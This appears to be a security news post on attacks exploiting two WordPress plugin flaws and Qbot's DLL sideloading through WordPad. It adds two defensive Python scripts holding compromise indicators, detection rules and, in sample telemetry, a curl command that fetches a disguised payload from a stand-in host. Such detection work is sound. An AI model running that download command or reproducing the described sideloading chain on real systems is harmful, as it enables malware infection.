
WordPress Vulnerabilities, Exploiting LiteSpeed Cache and Email Subscribers Plugins


In recent cybersecurity developments, hackers have been leveraging a critical vulnerability in the LiteSpeed Cache plugin for WordPress to compromise websites running outdated versions. LiteSpeed Cache, a popular caching plugin used by over five million WordPress sites, is designed to shorten page load times, improve user experience, and boost search engine rankings.

However, WPScan, Automattic's security team, has observed a significant increase in malicious activity targeting WordPress sites running versions of the LiteSpeed Cache plugin older than 5.7.0.1. The vulnerability in question, tracked as CVE-2023-40000, is a high-severity unauthenticated cross-site scripting flaw.

Attackers are using this vulnerability to inject malicious JavaScript code into critical WordPress files or into the database of vulnerable websites. By doing so, they are able to create administrator-level user accounts with specific names such as 'wpsupp-user' or 'wp-configuser'. Additionally, the presence of certain strings in the database, such as "eval(atob(Strings.fromCharCode", serves as an indicator of an ongoing compromise.

Despite efforts by many LiteSpeed Cache users to update to newer, non-vulnerable versions, an alarming number of sites, up to 1,835,000, still run outdated releases, leaving them susceptible to exploitation.

In a separate incident, hackers have turned their attention to another WordPress plugin, "Email Subscribers", exploiting a critical SQL injection vulnerability, CVE-2024-2876. This vulnerability, affecting plugin versions 5.7.14 and older, allows attackers to run unauthorized queries against the database and thereby create new administrator accounts on vulnerable WordPress sites. Although "Email Subscribers" has far fewer active installations than LiteSpeed Cache, approximately 90,000, the observed attacks highlight the opportunistic nature of cybercriminals.

To address these threats effectively, WordPress site administrators are urged to promptly update plugins to the latest versions, remove unnecessary components, and remain vigilant for signs of suspicious activity, such as the sudden creation of new admin accounts. In the event of a confirmed breach, comprehensive cleanup measures are essential, including the deletion of rogue accounts, password resets for all existing accounts, and the restoration of clean backups for both the database and site files. By staying proactive and implementing robust security practices, website owners can minimize the risk of falling victim to such malicious activities and safeguard their online assets effectively.
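A triage script for the indicators and version thresholds named above, added here as an example and not taken from the original post; the database rows and plugin versions are constructed, and the function names are my own.

```python
"""Triage checks for the WordPress indicators above (added example; sample data is constructed)."""
import re

# Indicators the post names: rogue admin usernames and the injected-JavaScript marker
ROGUE_ADMIN_LOGINS = {"wpsupp-user", "wp-configuser"}
INJECTED_JS_MARKER = "eval(atob(Strings.fromCharCode"

# Version thresholds from the post: LiteSpeed Cache is vulnerable below 5.7.0.1,
# Email Subscribers at 5.7.14 and older. Value is (threshold, vulnerable_when_equal).
THRESHOLDS = {"litespeed-cache": ((5, 7, 0, 1), False),
              "email-subscribers": ((5, 7, 14), True)}

def parse_version(text):
    """'5.7.0.1' -> (5, 7, 0, 1); tolerates suffixes such as '5.7.14-beta'."""
    return tuple(int(p) for p in re.findall(r"\d+", text))

def plugin_is_vulnerable(slug, version):
    threshold, inclusive = THRESHOLDS[slug]
    ver = parse_version(version)
    width = max(len(ver), len(threshold))        # pad so 5.7 compares as 5.7.0.0
    ver += (0,) * (width - len(ver))
    threshold += (0,) * (width - len(threshold))
    return ver <= threshold if inclusive else ver < threshold

def find_rogue_admins(users):
    """users: rows like {'user_login': ...} exported from wp_users."""
    return [u["user_login"] for u in users if u["user_login"] in ROGUE_ADMIN_LOGINS]

def find_injected_js(rows):
    """rows: (table, row_id, text) from wp_posts.post_content / wp_options.option_value."""
    return [(table, row_id) for table, row_id, text in rows if INJECTED_JS_MARKER in text]

# Constructed sample data standing in for real database exports
SAMPLE_USERS = [{"user_login": "editor-jane"}, {"user_login": "wpsupp-user"}]
SAMPLE_ROWS = [("wp_posts", 12, "<p>Welcome to our site</p>"),
               ("wp_options", 77, "<script>eval(atob(Strings.fromCharCode(...)))</script>")]

def triage(plugins, users, rows):
    """plugins: {slug: installed_version}. Returns every finding in one report dict."""
    return {"vulnerable_plugins": [s for s, v in plugins.items() if plugin_is_vulnerable(s, v)],
            "rogue_admins": find_rogue_admins(users),
            "injected_js": find_injected_js(rows)}

if __name__ == "__main__":
    print(triage({"litespeed-cache": "5.6.9", "email-subscribers": "5.7.15"},
                 SAMPLE_USERS, SAMPLE_ROWS))
```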

Threat Actors Exploit Qbot Malware: Evolving Tactics for Stealthy Attacks


Qbot operators use a malicious .DLL to hijack WordPad on Windows systems

In the ever-evolving landscape of cyber threats, threat actors continue to use sophisticated methods to gain access to computer systems and steal sensitive data. One such example is the Qbot operators, who use a crafty approach: a malicious .DLL that hijacks Windows WordPad.

This strategy allows them to evade detection and carry out their malicious activities unnoticed. In this blog post, we will delve into the workings of the Qbot operators and explore how they use WordPad as a covert tool.

Threat actors exploit vulnerability in Windows 10 WordPad

According to researchers, hackers have started exploiting a vulnerability in the Windows 10 preloaded WordPad text editor to distribute the Qbot malware. ProxyLife, a member of Cryptolaemus and a cybersecurity researcher, recently uncovered an email campaign where hackers are distributing the WordPad program along with a malicious .DLL file.

When WordPad is launched, the application searches for specific .DLL files it needs to function. It looks for these files in its own folder first. If a matching .DLL file is found there, WordPad loads and runs it automatically, even if it is malicious.

What is DLL Hijacking

The technique involved in this practice is commonly known as "DLL sideloading" or "DLL hijacking" and has been utilized by hackers before. Previously, attackers were observed using the Calculator app for a similar purpose.

In this case, when WordPad loads the DLL, the malicious file uses an executable called Curl.exe, located in the System32 folder, to download a second DLL disguised as a PNG file. This DLL is in fact Qbot, an old banking trojan capable of stealing emails for use in phishing attacks and of downloading additional malware such as Cobalt Strike.
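Detection logic for the chain described above, added here as an example that is not from the original post: it runs over constructed Sysmon-style records (field names follow Sysmon Event ID 1 ProcessCreate and Event ID 7 ImageLoaded; the paths, the DLL name and the curl command line are made up).

```python
"""Flag the WordPad sideloading chain in Sysmon-style telemetry (added example,
constructed sample events; a real deployment would read from the event log)."""
from pathlib import PureWindowsPath

# Where wordpad.exe and its legitimate dependencies normally live
WORDPAD_HOME = "c:\\program files\\windows nt\\accessories"
SYSTEM_DLL_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")

def _norm(path):
    return str(PureWindowsPath(path)).lower()

def _is(path, exe):
    return PureWindowsPath(path).name.lower() == exe

def relocated_wordpad(events):
    """Any event where wordpad.exe runs from outside its installed location (a mailed copy)."""
    return sorted({e["Image"] for e in events
                   if _is(e["Image"], "wordpad.exe") and not _norm(e["Image"]).startswith(WORDPAD_HOME)})

def sideloaded_dlls(events):
    """Event 7: wordpad.exe loaded a DLL from outside the Windows system directories."""
    return [e["ImageLoaded"] for e in events
            if e["EventID"] == 7 and _is(e["Image"], "wordpad.exe")
            and not _norm(e["ImageLoaded"]).startswith(SYSTEM_DLL_DIRS)]

def curl_spawned_by_wordpad(events):
    """Event 1: curl.exe with wordpad.exe as parent, the download stage described above."""
    return [e["CommandLine"] for e in events
            if e["EventID"] == 1 and _is(e["Image"], "curl.exe")
            and _is(e["ParentImage"], "wordpad.exe")]

# Constructed sample telemetry: a copy of WordPad run from a download folder
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\u\\Downloads\\doc\\wordpad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "wordpad.exe"},
    {"EventID": 7, "Image": "C:\\Users\\u\\Downloads\\doc\\wordpad.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll"},            # benign load
    {"EventID": 7, "Image": "C:\\Users\\u\\Downloads\\doc\\wordpad.exe",
     "ImageLoaded": "C:\\Users\\u\\Downloads\\doc\\helper.dll"},        # made-up DLL name
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",
     "ParentImage": "C:\\Users\\u\\Downloads\\doc\\wordpad.exe",
     "CommandLine": "curl.exe -o C:\\Users\\u\\AppData\\Local\\Temp\\img.png https://example.invalid/img.png"},
]

def analyze(events):
    return {"relocated_wordpad": relocated_wordpad(events),
            "sideloaded_dlls": sideloaded_dlls(events),
            "curl_from_wordpad": curl_spawned_by_wordpad(events)}
```

Each finding on its own is weak evidence, but all three together on one host match the chain the post describes and are worth an alert.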

Using WordPad to evade detection

By using legitimate programs like WordPad or Calculator to execute malicious DLL files, threat actors aim to evade antivirus programs and maintain a stealthy presence during the attack.

It's worth noting that this method depends on Curl.exe, which limits its effectiveness to Windows 10 and newer, as earlier versions of the operating system did not ship with this program preinstalled.

Even so, considering that older Windows versions are nearing end of support and users are moving to Windows 10 and 11, this limitation provides little respite.

According to recent reports from BleepingComputer, the QBot operation has transitioned to employing alternative infection methods in recent weeks. This indicates that the threat actors behind QBot are continually adapting their tactics to evade detection and improve their success rates.

As cybercriminals evolve their strategies, it becomes increasingly crucial for individuals and organizations to stay vigilant and employ robust cybersecurity measures to protect against emerging threats.